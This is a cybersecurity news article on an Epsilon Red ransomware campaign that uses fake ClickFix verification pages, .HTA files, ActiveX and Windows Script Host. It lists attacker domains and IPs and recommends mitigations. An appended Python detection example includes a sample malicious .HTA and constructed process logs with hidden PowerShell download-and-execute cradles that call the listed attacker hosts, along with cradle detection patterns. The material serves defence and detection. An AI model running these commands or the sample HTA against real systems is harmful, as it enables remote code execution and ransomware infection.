A new wave of ransomware attacks surfaced in July 2025, using weaponized HTML Application (.HTA) files to silently deploy the Epsilon Red strain of ransomware. The campaign, which has spread globally, masquerades as innocuous "ClickFix"-style verification pages, luring users who frequent popular platforms such as Discord, Twitch, Kick, and OnlyFans. CloudSEK researchers noted that this redirection technique departs from earlier clipboard-based Epsilon Red lures, giving the current iteration a markedly higher infection success rate.

The attack begins with a spoofed verification portal that prompts the user to "prove" authenticity before accessing content. Once the button is pressed, the site redirects to a secondary page configured to run embedded ActiveX controls, an antiquated but still-enabled Windows technology, which allows arbitrary command execution inside Internet Explorer's rendering engine. After the ActiveX object is triggered, the malicious code invokes the Windows Script Host (WSH) to spawn a hidden command shell. From there, a short PowerShell-like command pulls a binary from attacker infrastructure, executes it in memory, and leaves virtually no visible artifact during the initial compromise. Running within the same WSH process, the ransomware runs with the full privileges of the logged-on user, schedules persistence via schtasks, and begins network discovery. Victims then suffer the rapid data encryption typical of Epsilon Red, with ransom notes loosely styled after REvil's infamous communiqué but with minor grammatical tweaks.

CloudSEK analysts tied the hosting infrastructure to domains such as twtich[.]cc and capchabot[.]cc, and to the IP addresses 155.94.155.227:2269 and 213.209.150.188:8112, confirming a cohesive network operated by the same threat actor cluster.

Beyond file encryption, the technique exposes a deeper security gap: any environment in which legacy ActiveX is still enabled can be commandeered to launch native binaries directly from a browser session, sidestepping download quarantine, SmartScreen, and most endpoint defenses. Disabling ActiveX and WSH, enforcing modern browser policies, and continuously blocking the identified domains and IPs are the most immediate mitigations, while deeper network hardening and user-focused phishing simulations remain essential.

Tushar is a cyber security content editor at Cyber Security News with years of experience in the field, covering cyber security news and technology.
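The following is an added example, not code from the article or from CloudSEK, showing how a defender would operationalize the chain described above: a static check for the ActiveX and WSH primitives a malicious .HTA relies on (WScript.Shell instantiation, a hidden-window Run call, a download cradle), and a detection pass over process-creation telemetry that flags a shell whose ancestry runs launcher -> script host -> shell, a hidden window, a download cradle, a known indicator, or schtasks persistence spawned from WSH. Only the indicators in DEFANGED_IOCS come from the article; the .HTA sample, the key=value event format and the event lines are constructed for this example.

```python
"""Added example, not code from the article or CloudSEK: triage helpers for the
ClickFix page -> .HTA -> ActiveX -> WSH -> hidden shell -> download cradle chain.
Only DEFANGED_IOCS comes from the article; the .HTA sample and the log events are
constructed, and the key=value event format is an assumption of this example."""
import re

DEFANGED_IOCS = ["twtich[.]cc", "capchabot[.]cc",
                 "155.94.155.227:2269", "213.209.150.188:8112"]

def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")

IOC_HOSTS = {refang(i).rsplit(":", 1)[0] for i in DEFANGED_IOCS}

# -- 1. Static triage of a suspect .HTA body --
# COM objects an HTA instantiates to leave the rendering engine and run commands.
ACTIVEX_RE = re.compile(
    r"(?:new\s+ActiveXObject|CreateObject)\s*\(\s*[\"'](WScript\.Shell|Shell\.Application|"
    r"Scripting\.FileSystemObject|MSXML2\.(?:Server)?XMLHTTP[^\"']*|WinHttp\.WinHttpRequest[^\"']*)[\"']",
    re.I)
HIDDEN_RUN_RE = re.compile(r"\.Run\s*\([^;]*?,\s*0\s*[,)]", re.I)  # Run(cmd, 0): hidden window
CRADLE_RE = re.compile(r"(Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|"
                       r"Invoke-WebRequest|\biwr\b|bitsadmin|certutil|Reflection\.Assembly)", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)

def triage_hta(text: str) -> dict:
    """Which ActiveX/WSH abuse indicators a .HTA body contains."""
    hosts = {m.group(1).lower() for m in URL_HOST_RE.finditer(text)}
    return {"activex": bool(ACTIVEX_RE.search(text)),
            "hidden_run": bool(HIDDEN_RUN_RE.search(text)),
            "download_cradle": bool(CRADLE_RE.search(text)),
            "known_ioc_hosts": sorted(hosts & IOC_HOSTS)}

SAMPLE_HTA = """<html><head><title>Verify you are human</title><script>
var sh = new ActiveXObject("WScript.Shell");
sh.Run("powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://twtich.cc/ld')", 0, false);
</script></head><body>Click to continue</body></html>"""

# -- 2. Process-creation telemetry: launcher -> script host -> shell --
LAUNCHERS = {"mshta.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
HIDDEN_FLAG_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
SCHTASKS_RE = re.compile(r"schtasks(?:\.exe)?\s+/create", re.I)
EVENT_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line: str) -> dict:
    """Parse one 'key=value' process-start event (constructed format)."""
    ev = {k: v.strip('"') for k, v in EVENT_RE.findall(line)}
    ev["pid"], ev["ppid"] = int(ev["pid"]), int(ev["ppid"])
    ev["image"] = ev["image"].rsplit("\\", 1)[-1].lower()
    ev.setdefault("cmdline", "")
    return ev

def ancestry(ev: dict, by_pid: dict) -> list:
    """Image names of ev's ancestors, nearest parent first (cycle-safe)."""
    chain, seen, p = [], set(), by_pid.get(ev["ppid"])
    while p and p["pid"] not in seen:
        seen.add(p["pid"])
        chain.append(p["image"])
        p = by_pid.get(p["ppid"])
    return chain

def detect(lines) -> dict:
    """Map pid -> reasons for each event that matches the chain described above."""
    events = [parse_event(ln) for ln in lines]
    by_pid = {e["pid"]: e for e in events}
    alerts = {}
    for e in events:
        anc, cmd, reasons = set(ancestry(e, by_pid)), e["cmdline"], []
        if e["image"] in SHELLS and anc & SCRIPT_HOSTS and anc & LAUNCHERS:
            reasons.append("launcher->wsh->shell chain")
        if e["image"] in SHELLS and HIDDEN_FLAG_RE.search(cmd):
            reasons.append("hidden window")
        if CRADLE_RE.search(cmd):
            reasons.append("download cradle")
        if {m.group(1).lower() for m in URL_HOST_RE.finditer(cmd)} & IOC_HOSTS:
            reasons.append("known ioc host")
        if SCHTASKS_RE.search(cmd) and anc & SCRIPT_HOSTS:
            reasons.append("schtasks persistence from wsh")
        if reasons:
            alerts[e["pid"]] = reasons
    return alerts

# Constructed telemetry: one ClickFix chain plus a benign admin PowerShell (pid 6001).
SAMPLE_EVENTS = r'''
pid=4120 ppid=900 image=C:\Windows\explorer.exe cmdline="explorer.exe"
pid=5011 ppid=4120 image=C:\Windows\System32\mshta.exe cmdline="mshta.exe http://twtich.cc/verify.hta"
pid=5024 ppid=5011 image=C:\Windows\System32\wscript.exe cmdline="wscript.exe C:\Users\u\AppData\Local\Temp\v.js"
pid=5030 ppid=5024 image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c powershell.exe -w hidden -ep bypass -File C:\Users\u\AppData\Local\Temp\s.ps1"
pid=5041 ppid=5030 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://213.209.150.188:8112/p')"
pid=5050 ppid=5024 image=C:\Windows\System32\schtasks.exe cmdline="schtasks.exe /create /sc onlogon /tn Updater /tr C:\Users\u\AppData\Local\Temp\r.exe"
pid=6001 ppid=4120 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -File C:\scripts\inventory.ps1"
'''.strip().splitlines()
```

The ancestry walk is what separates the ClickFix chain from an administrator's own PowerShell: the benign pid 6001 above uses the same interpreter but has no script host between it and the browser or mshta.exe launcher, so it is not flagged. The event format is an assumption of this example; real Sysmon Event ID 1 records carry the same fields (Image, ParentProcessId, CommandLine), so the mapping is mechanical. Indicator matching is only as current as the article's list, and the hidden-window and cradle patterns are chosen for readability rather than completeness. For the mitigation side the article recommends, the WSH kill switch is the Enabled value under HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings; setting it to 0 stops wscript.exe and cscript.exe from running any script, which breaks the second stage of this chain regardless of how the .HTA got there.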
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 25 Jul 2025 11:45:12 +0000